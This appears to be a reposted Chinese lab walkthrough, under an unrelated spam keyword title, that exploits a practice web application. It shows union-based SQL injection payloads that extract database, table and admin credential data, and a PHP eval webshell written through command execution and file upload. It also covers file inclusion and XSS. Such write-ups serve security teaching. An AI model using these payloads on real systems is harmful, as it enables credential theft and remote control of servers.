您的位置:首页 > 财经 > 产业 > 徐州百姓网发布信息_湖北省高考招生综合信息服务平台_杭州seo推广优化公司_店铺运营

徐州百姓网发布信息_湖北省高考招生综合信息服务平台_杭州seo推广优化公司_店铺运营

2024/10/5 16:24:57 来源:https://blog.csdn.net/kknifek/article/details/142217431  浏览:    关键词:徐州百姓网发布信息_湖北省高考招生综合信息服务平台_杭州seo推广优化公司_店铺运营
徐州百姓网发布信息_湖北省高考招生综合信息服务平台_杭州seo推广优化公司_店铺运营

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

 

3.三处都是回显点

 

4.联合查询爆出库名

 

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+ 

 

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+ 

 

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+ 

 

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

 

2.上传一句话木马进去

 

3.将文件地址拼接到网址后进行访问

 

4.使用蚁剑连接

 

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

 

2.尝试输入ls有效

 

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php 

 

4.复制地址用蚁剑连接

 

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

 

2.访问php文件复制地址蚁剑连连接即可

 

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

 

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com